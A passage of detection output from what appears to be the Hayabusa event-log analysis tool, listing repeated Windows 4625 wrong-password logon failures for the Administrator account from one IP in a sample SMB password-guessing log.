NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: 